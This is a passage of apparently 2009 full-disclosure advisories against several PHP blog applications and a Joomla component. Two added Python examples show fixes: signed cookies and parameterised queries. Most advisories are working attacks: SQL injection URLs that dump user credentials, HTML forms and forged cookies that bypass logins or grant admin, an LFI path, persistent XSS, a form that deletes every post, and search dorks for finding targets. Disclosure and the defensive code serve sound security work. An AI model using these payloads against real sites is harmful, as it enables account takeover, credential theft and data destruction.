while ($result = mysql_fetch_assoc($resulted))
$comments[] = $result;


- [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin.login.php

$username = $_POST['username'];
$password = md5($_POST['password']);
include('./db_config.php');
$db = new db_stuff;
$db->connect();
$result = $db->query("SELECT * FROM `cblog_users` WHERE `username` =
'$username'", $querys);
if (mysql_num_rows($result) < 1 || mysql_num_rows($result) > 1)
{
echo "Incorrect username";
exit;
}
$result = mysql_fetch_assoc($result);
if ($result['password'] !== $password)
{
echo 'Incorrect Password';
exit;
}


- [C] Local File Inclusion

[-] Requisites: none
[-] File affected: admin.php

This bug allows an admin to include local files.
Authentication can be bypassed using the
previous bug.
With this bug it is possible to execute remote
commands using the Apache logs.

...
} else if (isset($_GET['act']) && $_SESSION['is_admin'])
{
$loc = 'admin.'.$_GET['act'].'.php';
include('./'.$loc);
}
...


*

[+] Code


- [A] SQL Injection

http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT
NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23


- [B] Authentication Bypass

<html>
<head>
<title>BlindBlog 1.3.1 Authentication Bypass Exploit</title>
</head>
<body>
<form
action="http://www.site.com/path/admin/admin.login.php?go=1"
method="POST">
<input type="hidden" name="username" value="-1' UNION
ALL SELECT
1,'admin',MD5('expl')#">
<input type="hidden" name="password" value="expl">
<input type="submit" value="Exploit">
</form>
</body>
</html>


- [C] Local File Inclusion

Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php

http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd


BlogMan 0.45 Multiple Vulnerabilities

2009-03-02 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***


Application:   BlogMan
  http://sourceforge.net/projects/blogman/
Version: 0.45
Bug:   * Multiple SQL Injection
  * Authentication Bypass
  * Privilege Escalation
Exploitation:  Remote
Date: 1 Mar 2009
Discovered by:  Salvatore drosophila Fresta
Author:  Salvatore drosophila Fresta
  e-mail: drosophila...@gmail.com


*

- BUGS

This blog is entirely vulnerable to SQL injection.
The following are vulnerable queries that can be used
to obtain restricted information.

#[1] SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: index.php, register.php, viewall.php

The following lines are improperly checked:

/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = "SELECT * FROM user WHERE UserID='".$id."'";
$user = mysql_fetch_array(mysql_query($query)) or
die(mysql_error());
echo "<p class='loginusername'><a
href='edit.php?id=".$id."'>".$user['UserName']."</a></p>\n";
*/

Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:

Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/


#[2] SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: read.php

This bug allows a guest to view the username
and password of a registered user.

http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23


#[3] SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: profile.php

This bug allows a guest to view the username
and password of a registered user.

http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23


#[1] Authentication Bypass:

Requisites: magic_quotes_gpc = off

File affected: doLogin.php

The following lines are improperly checked:

/*
$un = $_POST['un'];
$pw = $_POST['pw'];

...

$pwHashed = mysql_fetch_array(mysql_query("SELECT
PASSWORD('".$pw."')"));
$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user
WHERE
UserName='".$un."'"));
if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
$expires = time() + 3*24*60*60;
setcookie("blogmanuserid", $userRow['UserID'], $expires);
}
*/

Using a SQL Injection bug it is possible to bypass
conditions and to set an arbitrary UserID value.

The following information must be sent using
POST method to doLogin.php

un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass

The first value is UserID, the third value is the password,
the tenth value is UserDisabled and the eleventh value is
UserActive.


#[2] Authentication Bypass:

Requisites: none

File affected: all

It is possible to bypass the authentication
system by creating a cookie named 'blogmanuserid',
and inserting the value of a registered user id
into the content(sometimes 1 for admin):

Name: blogmanuserid
Content: 1  
Server: target_server (example: localhost)
Path: /blogman/


Privilege Escalation:

Requisites: magic_quotes_gpc = off

File affected: admin.php

It is possible to escalate privileges using
a SQL Injection bug through a cookie.

The following lines are improperly checked:

/*
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserID='".$id."'"));
if (!$user['UserCanAdmin']) {
echo "<meta http-equiv='refresh'
content='0;index.php'></head></html>";
} else {
...
}
*/

Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1# 
Server: target_server
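
The second authentication bypass and the privilege escalation in this post rest on one design flaw: the server reads a user id straight out of a cookie the client controls, so `blogmanuserid=1` is all it takes. The following is an added example, not BlogMan's code and not from the author of the post: it shows that check beside the smallest fix that keeps the pattern, binding the id to an HMAC under a key only the server holds. The cookie format, the key and the user ids are assumptions constructed for the example.

```python
import hashlib
import hmac

# Assumption for the example: a key that exists only on the server. In a real
# deployment it is random, loaded from configuration, never in source.
SERVER_KEY = b"example-server-key-replace-with-random-bytes"


def user_from_cookie_vulnerable(cookie_value):
    """BlogMan's check as the post describes it: the cookie *is* the user id,
    so any client can claim any account."""
    try:
        return int(cookie_value)
    except ValueError:
        return None


def issue_cookie(user_id, key=SERVER_KEY):
    """Set at login: '<id>|<hex HMAC-SHA256 of id under the server key>'."""
    body = str(int(user_id)).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return f"{body.decode()}|{tag}"


def user_from_cookie_signed(cookie_value, key=SERVER_KEY):
    """Accept the id only if the tag verifies; anything else is anonymous.
    compare_digest keeps the tag check constant-time."""
    body, sep, tag = cookie_value.rpartition("|")
    if not sep or not body.isdigit():
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return int(body)


def demo():
    """Replays the post's forged cookie against both checks."""
    bob = issue_cookie(2)                      # what a real login sets for user 2
    forged_admin = "1"                         # the post's payload: the admin id
    tampered = "1|" + bob.split("|", 1)[1]     # bob's valid tag glued onto id 1
    return {
        "vulnerable_accepts_forged": user_from_cookie_vulnerable(forged_admin),
        "signed_rejects_forged": user_from_cookie_signed(forged_admin),
        "signed_rejects_tampered": user_from_cookie_signed(tampered),
        "signed_accepts_legit": user_from_cookie_signed(bob),
        "other_key_rejects": user_from_cookie_signed(bob, key=b"another-server"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:28s} {value}")
```

The usual fix is a random, opaque session id with the user id kept server-side; the MAC variant is shown because it is the smallest change to the pattern in the post. Neither replaces a parameterised query: the same cookie value reaching `SELECT * FROM user WHERE UserID='...'` unescaped is a separate bug and must be bound as a parameter regardless of how the cookie is protected.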

EZ-Blog Beta 1 Multiple SQL Injection

2009-03-02 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***


Application:  EZ-Blog
 http://sourceforge.net/projects/ez-blog/
Version:Beta 1
Bug: * Multiple SQL Injection
Exploitation: Remote
Date:1 Mar 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
 e-mail: drosophila...@gmail.com


*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off

This is a crazy application because it does not
require authentication for posting, deleting,
etc., and it is entirely vulnerable to SQL
Injection, as follows:

http://site/path/public/view.php?storyid=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10%23

There isn't highly reserved information in the
database, but it is possible to cause inconvenience.
The following injection allows deleting all
posts:

<form action="http://site/path/admin/remove.php" method="POST">
<input type="hidden" name="kill" value="1'or'1'='1">
<input type="hidden" name="confirm" value="1">
<input type="hidden" name="rm" value="true">
<input type="submit" value="Exploit">
</form>


*

-- 
Salvatore drosophila Fresta
CWNP444351


RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / XSS Persistent Vulnerability

2009-03-02 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: RitsBlog
[+] Version: 0.4.2
[+] Website: http://sourceforge.net/projects/ritsblog/

[+] Bugs: [A] SQL Injection
  [B] XSS Persistent

[+] Exploitation: Remote
[+] Date: 02 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

- [1] Bugs
- [2] Code
- [3] Fix


*

[+] Bugs

- [A] SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: ritsBlogAdmin.class.php

This blog is entirely vulnerable to SQL Injection.
The following is the vulnerable query that can be
used to bypass authentication.

In jobs.php:

if ($_GET["j"] == "login"){
 if ($blog -> login($_GET["p"])){
 $_SESSION["loggedin"] = "ok";
 $_SESSION["userID"] = $blog -> userID;
 echo "Password found. Loging in...";
 

In ritsBlogAdmin.class.php:

function login($password){
 global $db;
 $sql = "select * from users where secretWord = '$password'";
 ...
}


- [B] XSS Persistent

[-] Requisites: none
[-] File affected: ritsBlogAdmin.class.php

In jobs.php:

if ($_POST["j"] == "addComment"){
 echo $blog -> addComment($_POST["id"], $_POST["name"],
$_POST["body"]);
}

In ritsBlogAdmin.class.php:

function addComment($id, $name, $body){
 global $db;
 $sql = "INSERT INTO comments (name, postID, date, text)
VALUES('" . addslashes($name) . "','" . $id . "',NOW(),'" .
addslashes($body) . "')";
 ...
}


*

[+] Code

- [A] SQL Injection

http://www.site.com/path/blogAdmin/jobs.php?j=login&p=1'or'1'='1


- [B] XSS Persistent

It is possible to use the forms in index.php or
to send the following values via POST:

j=addComment&id=54&name=myname&body=<script>alert('XSS');</script>

or

j=addComment&id=54&name=<script>alert('XSS');</script>&body=body


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351
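
The login queries quoted in the BlindBlog, BlogMan and RitsBlog posts above share one defect: the request value is spliced into the SQL string, and with magic_quotes_gpc off the quote character passes straight through. The following is an added example, not code from any of those projects or from the author of the posts: it replays the payload shapes from the posts (UNION row forgery with a chosen MD5, comment truncation, tautology) against an in-memory SQLite database and puts a parameterised version beside each. The table, the accounts and their secrets are constructed for the example. Two dialect differences from MySQL, which the applications use: SQLite has no MD5() (one is registered from hashlib), and its comment marker is `-- ` where the posts use `#` (URL-encoded as %23).

```python
import hashlib
import hmac
import sqlite3


def md5_hex(text: str) -> str:
    """MySQL's MD5() returns a hex digest; registered into SQLite below."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample accounts whose credentials the attacker does not know."""
    db = sqlite3.connect(":memory:")
    db.create_function("MD5", 1, md5_hex)
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, "
               "password TEXT, secretWord TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", md5_hex("admin-pw-not-known"), "admin-word-not-known"),
        (2, "bob", md5_hex("bob-pw-not-known"), "bob-word-not-known"),
    ])
    return db


def login_lookup_then_compare(db, username, password):
    """BlindBlog / BlogMan shape: the row is fetched by username only and the
    hash is compared in application code. The value is concatenated as the
    posts show, so a UNION can supply the entire row, hash included."""
    sql = ("SELECT id, username, password FROM users WHERE username='"
           + username + "'")
    row = db.execute(sql).fetchone()
    if row is None:                      # "Incorrect username"
        return None
    if row[2] != md5_hex(password):      # "Incorrect Password"
        return None
    return row[1]


def login_by_secret_word(db, secret):
    """RitsBlog shape: a single concatenated condition, so a tautology suffices."""
    sql = "SELECT username FROM users WHERE secretWord = '" + secret + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_lookup_then_compare_safe(db, username, password):
    """Hardened form: a bound parameter keeps the input out of the SQL
    grammar, and the hash check is constant-time."""
    row = db.execute("SELECT username, password FROM users WHERE username=?",
                     (username,)).fetchone()
    if row is None or not hmac.compare_digest(row[1], md5_hex(password)):
        return None
    return row[0]


def login_by_secret_word_safe(db, secret):
    row = db.execute("SELECT username FROM users WHERE secretWord=?",
                     (secret,)).fetchone()
    return row[0] if row else None


def demo():
    """Replays the payload shapes; each value is the account that got logged in."""
    db = make_db()
    # BlindBlog [B]: forge a row whose password column is MD5 of a value we pick.
    forged = "-1' UNION ALL SELECT 1,'admin',MD5('expl')-- "
    # Comment truncation alone: the real admin row comes back, but the
    # application-side hash compare still fails; that is why the BlindBlog and
    # BlogMan bypasses need the UNION rather than just a comment marker.
    truncated = "admin'-- "
    # RitsBlog [A]: tautology against a single-condition WHERE.
    tautology = "1'or'1'='1"
    return {
        "union_forged_row": login_lookup_then_compare(db, forged, "expl"),
        "comment_truncation_only": login_lookup_then_compare(db, truncated, "expl"),
        "tautology": login_by_secret_word(db, tautology),
        "safe_union": login_lookup_then_compare_safe(db, forged, "expl"),
        "safe_tautology": login_by_secret_word_safe(db, tautology),
        "safe_legit": login_lookup_then_compare_safe(db, "bob", "bob-pw-not-known"),
    }


if __name__ == "__main__":
    for name, who in demo().items():
        print(f"{name:26s} -> {who}")
```

The UNION payload works because the column count (three here, matching the `id, username, password` the login selects) lines up with the original query; the posts' longer payloads with 16 or 7 positional values are the same trick against wider tables. With the parameter bound, the same strings are just usernames that do not exist.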


gigCalendar Joomla Component 1.0 SQL Injection

2009-02-23 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***


Application:gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version:gigCalendar 1.0
Bug:* SQL Injection
Exploitation:   Remote
Dork:   inurl:index.php?option=com_gigcal
Date:   21 Feb 2009
Discovered by:Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com


*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: banddetails.php

This bug allows a guest to view username and
password of a registered user.


http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
from jos_users%23

*

-- 
Salvatore drosophila Fresta
CWNP444351


gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection

2009-02-23 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***


Application:gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version:gigCalendar 1.0
Bug:* SQL Injection
Exploitation:   Remote
Dork:   inurl:index.php?option=com_gigcal
Date:   21 Feb 2009
Discovered by:  Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com


*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: banddetails.php

This bug allows a guest to view username and
password of a registered user.


http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
FROM jos_users%23

*

-- 
Salvatore drosophila Fresta
CWNP444351


gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection

2009-02-23 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***


Application:gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version:gigCalendar 1.0
Bug:* SQL Injection
Exploitation:   Remote
Dork:   inurl:index.php?option=com_gigcal
Date:   21 Feb 2009
Discovered by:Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com


*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: venuedetails.php

This bug allows a guest to view username and
password of a registered user.


http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_venues_id=-1'
UNION ALL SELECT 1,concat('username: ',
username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password:
', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23

*

-- 
Salvatore drosophila Fresta
CWNP444351


Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass

2009-01-28 Thread Salvatore drosophila Fresta
### Salvatore drosophila Fresta ###


Application:Max.Blog
http://www.mzbservices.com
Version:Max.Blog <= 1.0.6
Bug:* Offline Authentication Bypass
Exploitation:   Remote
Dork:   intext:Powered by Max.Blog
Date:   27 Jan 2009
Discovered by:  Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com




- BUGS

Offline Authentication Bypass Exploit:

Requisites: magic quotes = off

File affected: offline_auth.php

This bug allows a guest to bypass an offline authentication service
using a SQL Injection vulnerability.



- CODE

<html>
<head>
<title>
Salvatore drosophila Fresta - Max.Blog <= 1.0.6
Offline
Authentication Bypass Exploit
</title>
</head>
<body>
<form action="http://www.site.com/path/offline_auth.php" method="POST">
<input type="text" name="username" value="admin'#" size="15">
<input type="hidden" name="password">
<input type="submit" value="Go!">
</form>
</body>
</html>



-- 
Salvatore drosophila Fresta
CWNP444351


Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability

2009-01-27 Thread Salvatore drosophila Fresta
### Salvatore drosophila Fresta ###


Application:Max.Blog
http://www.mzbservices.com
Version:Max.Blog <= 1.0.6
Bug:* SQL Injection
Exploitation:   Remote
Dork:   intext:Powered by Max.Blog
Date:   20 Jan 2009
Discovered by:  Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com




- BUGS

SQL Injection:

File affected: show_post.php

This bug allows a guest to view the username and password (md5) of a
registered user with the specified id (usually 1 for the admin).


http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username:
', username),concat('password: ',
password),4,5,6,7+FROM+users+WHERE+id=1%23




-- 
Salvatore drosophila Fresta
CWNP444351


Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability

2009-01-27 Thread Salvatore drosophila Fresta
### Salvatore drosophila Fresta ###


Application:Max.Blog
http://www.mzbservices.com
Version:Max.Blog <= 1.0.6
Bug:* SQL Injection
Exploitation:   Remote
Dork:   intext:Powered by Max.Blog
Date:   27 Jan 2009
Discovered by:  Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com




- BUGS

SQL Injection:

Requisites: magic quotes = off

File affected: submit_post.php

This bug allows a registered user to view the username and password (md5)
of a registered user with the specified id (usually 1 for the admin).


http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23



-- 
Salvatore drosophila Fresta
CWNP444351